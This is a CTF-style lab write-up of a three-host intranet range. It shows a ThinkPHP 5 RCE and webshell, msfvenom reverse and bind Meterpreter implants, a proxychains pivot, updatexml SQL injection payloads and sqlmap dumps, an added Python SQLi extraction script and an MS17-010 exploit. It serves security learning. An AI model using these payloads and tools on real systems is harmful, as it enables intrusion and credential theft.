CFS three-layer intranet roaming (2019): a CTF case

Tips: after downloading the target range, configure the network adapters, IP addresses and so on yourself, so that the three-layer intranet topology actually holds.

The range is penetrated layer by layer starting from the web tier. The point is mainly to learn the way of thinking and lay a foundation for later intranet penetration.

The topology is as follows:

(Topology diagram, borrowed from brother Di, hhh; the image is not reproduced here.)

Penetration test


Probe the target, exploit the web vulnerability (ThinkPHP 5 RCE), obtain webshell access, collect the flag, then move on to Target2.

Information collection:

Use nmap to scan all TCP ports and fingerprint the services:

(I did not configure the IPs as in the topology here; configure the IPs yourself.)

nmap -sV -p 1-65535 -T4

Append the IP of target1 as the scan target. -p 1-65535 covers every TCP port, -sV grabs service banners, and -T4 speeds things up, which is fine on a lab network.

If the page says the site has not been created yet, configure it in the BT (Baota) panel backend. The environment setup tutorials are

Visit the discovered port 80 (it serves the ThinkPHP public directory).

target1 (built on ThinkPHP 5)

Go straight to a public exploit or an exploitation tool (convenient and fast; you can also do it by hand if you want to understand the well-known ThinkPHP 5.x remote code execution bug).

The tool generates the payload automatically and is thoughtful enough to hand you the backdoor's connection address; the password is given as well.

Connect with AntSword and you have the shell and the flag.

Alternatively, use an exploit published online.

It is just as considerate: it produces the payload, the database information also comes out, and it writes the backdoor file with one click.

Lateral movement into the intranet

Go straight to MSF.

1. Generate an MSF backdoor (substitute your own IP and port):

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your:ip LPORT=1111 -f elf > t1.elf

2. Set up the listener:

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST your:ip
set LPORT 1111
exploit -j

Upload the generated implant with AntSword and execute it. If the file is not executable, run chmod +x t1.elf first.

A reverse payload works at this stage only because target1 can reach Kali directly; keep that in mind, because the deeper hosts cannot.

Once it runs, the shell calls back to the handler and the subsequent penetration can continue.

Intranet proxying (pivoting)

Information gathering and route configuration

Get the network interfaces: run get_local_subnets
View the routing table: run autoroute -p
Add a route: run autoroute -s followed by the subnet (the target segment in CIDR form)

Network interfaces: three segments come back.

Routing table: nothing added yet.

Add a route for the 22 segment.

Afterwards the route shows up in autoroute -p, and the 22 segment can be reached from inside MSF (only MSF itself can use the route, because it is bound to the meterpreter session).

The route exists, but only the session that called back can reach the intranet targets in the 22 segment; Kali's own network stack still cannot.

Tips: only traffic that passes through the MSF session reaches the 22 segment. Make sure you understand this point.

The current session is session 1, built on target1's shell. With the route in place it can talk to the 22 segment. So we want to attack the 22 segment with our tools through session 1. How?

(The solution is to open a proxy locally; MSF has a module that does this. The proxy exposes a port for other programs to connect to, so our own machine (our workstation, not only the attacking Kali) can connect to that port on Kali and have its traffic pushed through the session into the intranet.)

Use a SOCKS4 proxy plus proxychains4 to get into the intranet:

background    # send the shell session you obtained to the background
use auxiliary/server/socks_proxy
set VERSION 4a    # match the socks4 line in proxychains4.conf; use 5 with a socks5 line
set SRVPORT 1080
run -j

On Linux the local proxy port can now be used for access.

Tips: the proxychains4 configuration must be edited, otherwise nothing gets through.

vim /etc/proxychains4.conf

Edit the configuration at the end of the file: under [ProxyList], add the line socks4 127.0.0.1 1080 (matching the port and SOCKS version set in MSF) and remove or comment out the default entry.

Scanning the segment with nmap directly from Kali is impossible; it reports the hosts as not found, because Kali has no route to them.

You need to run the scanner through the freshly configured proxy:

proxychains4 nmap -Pn -sT

followed by the target host or range. -Pn and -sT are mandatory: proxychains only hooks the libc connect() call, so only full TCP connect scans pass through the tunnel, while SYN scans and ICMP host discovery use raw sockets and bypass the proxy entirely. Keep the port list small (-p or --top-ports), since every probe is a full proxied TCP connection.

On Windows, install SocksCap64 or Proxifier and configure the proxy there.

Just add the tools you want to run through it.

If the browser needs to reach the 22 segment it is just as simple: point the browser's SOCKS proxy setting at Kali's IP and port 1080.
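To make the pivot concrete, here is an added example (not from the original post) of what proxychains4 does for each connection nmap -sT makes: a minimal SOCKS4/4a client in Python that asks the MSF socks_proxy module to open TCP connections from inside the session. It assumes the proxy listens on 127.0.0.1:1080 as configured above; the target addresses are placeholders for hosts in the 22 segment. It also shows the SOCKS4a form, which lets the proxy (and therefore the pivot) resolve hostnames instead of the attacker box.

```python
"""Minimal SOCKS4 / SOCKS4a client in pure Python.

This is what proxychains4 does for every connect() that nmap -sT makes:
it talks to the Metasploit socks_proxy module (assumed to listen on
127.0.0.1:1080, as configured above) and asks it to open the TCP
connection from inside the pivot session.
"""
import socket
import struct

PROXY = ("127.0.0.1", 1080)  # assumption: SRVPORT 1080 from socks_proxy

SOCKS_VERSION = 4
CMD_CONNECT = 1
# Reply codes carried in the second byte of the 8-byte SOCKS4 reply
REPLY_GRANTED = 0x5A
REPLY_NAMES = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "rejected: cannot connect to identd",
    0x5D: "rejected: identd user mismatch",
}


def build_connect_request(host, port, userid=b""):
    """Build the SOCKS4 CONNECT request for host:port.

    A dotted IPv4 address goes into the DSTIP field.  Anything else uses
    the SOCKS4a extension: DSTIP = 0.0.0.1 and the hostname appended after
    the USERID, so the proxy (i.e. the MSF session) resolves the name
    inside the intranet rather than the attacker box doing it.
    """
    try:
        dstip = socket.inet_aton(host)
        hostname = b""
    except OSError:
        dstip = b"\x00\x00\x00\x01"
        hostname = host.encode() + b"\x00"
    # VN=4, CD=1 (CONNECT), DSTPORT (16-bit big-endian), DSTIP (4 bytes)
    header = struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, dstip)
    return header + userid + b"\x00" + hostname


def parse_reply(data):
    """Parse the 8-byte reply: VN (always 0), CD, DSTPORT, DSTIP.

    Returns (granted, code).  Port and IP in the reply are irrelevant for CONNECT.
    """
    if len(data) != 8:
        raise ValueError("SOCKS4 reply must be 8 bytes, got %d" % len(data))
    vn, code, _port, _ip = struct.unpack("!BBH4s", data)
    if vn != 0:
        raise ValueError("unexpected SOCKS4 reply version %d" % vn)
    return code == REPLY_GRANTED, code


def _recv_exact(sock, n):
    """Read exactly n bytes (recv() may return fewer than requested)."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def connect_via_socks4(host, port, proxy=PROXY, timeout=3.0):
    """Return a socket connected to host:port through the proxy, or raise
    ConnectionError carrying the proxy's reason (e.g. a closed target port)."""
    sock = socket.create_connection(proxy, timeout=timeout)
    try:
        sock.sendall(build_connect_request(host, port))
        granted, code = parse_reply(_recv_exact(sock, 8))
    except Exception:
        sock.close()
        raise
    if not granted:
        sock.close()
        raise ConnectionError(REPLY_NAMES.get(code, "unknown reply %#x" % code))
    return sock


def connect_scan(host, ports, proxy=PROXY):
    """TCP connect scan through the pivot: the hand-rolled equivalent of
    `proxychains4 nmap -Pn -sT -p ...`.  Only full TCP connections can be
    tunnelled this way; SYN scans and ICMP ping need raw sockets and never
    enter the proxy, which is why -Pn -sT is required with proxychains."""
    open_ports = []
    for port in ports:
        try:
            connect_via_socks4(host, port, proxy).close()
            open_ports.append(port)
        except (ConnectionError, OSError):
            continue
    return open_ports


if __name__ == "__main__":
    import sys
    target = sys.argv[1]  # a host in the 22 segment; fill in your own address
    print(connect_scan(target, [21, 22, 80, 443, 3306, 8080]))
```

A rejected reply (0x5B) is what you get for a closed port on the other side of the pivot, so the proxy reply itself is the scan result; a timeout on the proxy connection means the MSF module is not listening, not that the target is down.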

Access to the 22 segment succeeds; time for another round of information gathering.

After port scanning, look at port 80 and find BageCMS.

Brute-force directories to find the admin backend; I use dirb/dirsearch.

robots.txt reveals the directories.

Find the likely backend path, visit it and try.

The backend is reachable, but brute-forcing the login fails. Auditing the website's source code reveals the SQL injection point.

Manual error-based injection (updatexml):

index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

Table names:

index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+

(MySQL puts at most 32 characters of the string into the XPATH error message. That is why the first payload wraps the value in substr(); the second one, without substr(), shows only the first 32 characters of the table list, so step the offset forward to read the rest.)

Finally, dump the data:

Look up the MD5 hash and obtain the backend credentials: admin / 123qwe

Log in to the backend: http://url/index.php?r=admini/default/index

Or run sqlmap through the proxy (put the vulnerable URL in -u; it is omitted here):

proxychains4 sqlmap -u "" -p keyword --dbs
proxychains4 sqlmap -u "" -p keyword -D bagecms --tables
proxychains4 sqlmap -u "" -p keyword -D bagecms -T bage_admin --columns
proxychains4 sqlmap -u "" -p keyword -D bagecms -T bage_admin -C username,password --dump
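The manual payloads above leave the windowing implicit, so here is an added example (not from the original post) that drives the page's updatexml payload in 32-character substr() windows and stitches the result back together. It assumes the page's index.php?r=vul&keyword= parameter; the HTTP transport, the simulated MySQL backend and the sample table list are constructed for this example.

```python
"""Error-based SQL extraction through updatexml(), windowed with substr().

MySQL puts at most 32 characters of the offending string into the
"XPATH syntax error" message, so a value longer than that (a group_concat()
of table names, say) has to be read in 32-character windows and stitched
together.  The payload shape is the page's own; the HTTP transport and the
simulated backend below are added for this example.
"""
import re
import urllib.error
import urllib.parse
import urllib.request

WINDOW = 32  # MySQL's XPATH error text limit
ERROR_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def build_payload(expr, offset, length=WINDOW):
    """Value for the vulnerable `keyword` parameter: the page's updatexml
    payload with substr() parameterised on offset/length (1-based, as in
    MySQL).  The trailing space after `--` becomes `+` once URL-encoded,
    which is the `--+` seen in the manual payloads."""
    return ("1' and updatexml(1,concat(0x7e,substr((%s),%d,%d),0x7e),1)-- "
            % (expr, offset, length))


def extract(fetch, expr, max_rounds=64):
    """Reassemble the full value of the SQL expression `expr`.

    `fetch(payload)` must return the response body for that injected value.
    Each round shows '~' + up to 31 characters; when the closing '~' fits
    into the window the remainder has been read and we stop.  (Assumes the
    extracted data itself contains no '~'.)"""
    parts = []
    offset = 1
    for _ in range(max_rounds):
        body = fetch(build_payload(expr, offset))
        m = ERROR_RE.search(body)
        if not m:
            raise RuntimeError("no XPATH error in response; injection not firing")
        shown = m.group(1)
        if not shown.startswith("~"):
            raise RuntimeError("unexpected error text %r" % shown)
        shown = shown[1:]
        if shown.endswith("~"):
            parts.append(shown[:-1])
            return "".join(parts)
        parts.append(shown)
        offset += len(shown)
    raise RuntimeError("value did not terminate within %d windows" % max_rounds)


def http_fetch(base_url):
    """fetch() for the real target: GET base_url?r=vul&keyword=<payload>.
    Run the script under proxychains4 so the requests go through the pivot.
    MySQL errors often surface as HTTP 500, hence the HTTPError handling."""
    def fetch(payload):
        query = urllib.parse.urlencode({"r": "vul", "keyword": payload})
        try:
            with urllib.request.urlopen(base_url + "?" + query, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.read().decode("utf-8", "replace")
    return fetch


def simulate_mysql(secret):
    """Constructed stand-in for the vulnerable page, for offline use: it
    applies the injected substr() window to `secret` and truncates the
    XPATH error text to 32 characters exactly as MySQL does."""
    arg_re = re.compile(r"substr\(\(.*\),(\d+),(\d+)\),0x7e\)")

    def fetch(payload):
        m = arg_re.search(payload)
        off, ln = int(m.group(1)), int(m.group(2))
        sub = secret[off - 1:off - 1 + ln]
        msg = ("~" + sub + "~")[:WINDOW]
        return "<pre>XPATH syntax error: '%s'</pre>" % msg
    return fetch


TABLES_EXPR = ("select group_concat(table_name) from information_schema.tables "
               "where table_schema='bagecms'")

if __name__ == "__main__":
    # constructed sample: a table list longer than one 32-character window
    sample = "bage_admin,bage_attr,bage_catalog,bage_comment,bage_link,bage_post,bage_tag"
    print(extract(simulate_mysql(sample), TABLES_EXPR))
    # against the real page: extract(http_fetch("http://url/index.php"), TABLES_EXPR)
```

Each window yields 31 usable characters (the leading '~' takes one), so the offset advances by whatever came back rather than by a fixed 32; that is the detail that silently corrupts results when done by hand.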

Log in to the backend and take the flag.

A content template is found; try writing a shell into it.

Use AntSword to connect to the shell through the proxy; AntSword has a built-in proxy setting.

After getting the shell:

Continue by uploading an implant to get a session in MSF. But target2 sits in an internal segment and cannot initiate connections back to us, so a reverse payload would never call home. Use a bind payload instead and let MSF connect forward to it through the route.

Generate a bind (forward-connection) backdoor:

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf

Connect forward from MSF:

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST
set LPORT 3333
exploit

RHOST is target2's address in the 22 segment. This works because the route added through session 1 lets MSF reach that segment; the new session arrives as session 2.

Same old routine: information gathering plus route configuration, this time on session 2.

Get the network interfaces: run get_local_subnets
Add a route: run autoroute -s followed by the 33 segment
View the routing table: run autoroute -p

The SOCKS proxy started earlier keeps working: it forwards whatever MSF can route, so the new route is picked up without restarting it.

Continue by scanning the 33 segment through the proxy:

proxychains4 nmap -Pn -sT

followed by the target in the 33 segment.

The host turns out to be Windows with ports 445 and 3389 open. Try MS17-010 (optionally confirm the host is vulnerable first with the auxiliary/scanner/smb/smb_ms17_010 module):

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOSTS
exploit

RHOSTS is target3's address in the 33 segment. Note the module choice: ms17_010_psexec exploits the same MS17-010 SMB bug as the EternalBlue module, but through the named-pipe transaction path, and is the more reliable option against a lab box. The bind payload is again required because target3 cannot reach Kali, while MSF can reach target3 via the route on session 2.

After the session comes back you can run system commands freely. The shell output is garbled; run chcp 65001 to switch the code page to UTF-8, which fixes it.

net user

Search for the flag:

cd \
dir /S /B *flag*
type C:\Windows\System32\config\flag.txt
# /S searches the given directory and all its subdirectories
# /B bare output: folder or file names only

Finally, read it with type.

Three flags captured so far.


1. It may be that the environment was not configured properly, which is why both my local machine and Kali could reach all three target machines. Hmm, I have not found the reason; the network adapter is not working as intended, and I don't understand why it works anyway (let's pretend it doesn't, hhhhhh).

2. When attacking target3 from target2, I didn't fully understand the meaning of the forward (bind) connection.

3. To summarize the attack process: information gathering on the IP and its ports finds port 80 open with ThinkPHP; the public exploit gives the shell on Target1. MSF generates an implant that is uploaded to Target1 and executed with Kali listening; once the session arrives, information gathering starts and a route to the 22 segment is added. On Linux, proxychains4 handles the proxy communication so that other tools can scan the 22 segment; on Windows, Proxifier/SocksCap can do the same. Scanning the 22-segment IP through the proxy finds port 80 open, serving BageCMS. Directory scanning finds the backend path in robots.txt; brute-forcing the login fails; auditing the web source reveals the injection point. SQLmap or manual injection dumps the backend account and password, and we log in. The backend's template function lets us write a shell, AntSword connects to it, and we have Target2's shell. Target2 then serves as a springboard against Target3, generating an implant for a forward connection. (My general understanding: the MSF shell session on Target2 is what we continue attacking Target3 with.) We generate a bind backdoor and let MSF connect forward. (Personal understanding: having obtained Target2's shell, the implant is produced through Target2's session to attack Target3, and because session 2 has a route established, MSF can access the 33 segment.) Information gathering on Target3 shows ports 445/3389 open, so ms17010 is tried directly (or based on Target2's shell session). ms17010 gets the shell, and that is the end.

4. Don't limit yourself to MSF. We do have to learn other tools later, such as CS, Ladon and the other common tools out there.

5. The main thing is to learn a way of thinking and lay a foundation for future intranet penetration. Some parts I still have no idea about. Hmm, intranet work feels much harder than web.

Tags: Cyber Security security network Intranet Penetration

Posted by rahish on Sun, 07 Aug 2022 21:54:33 +0530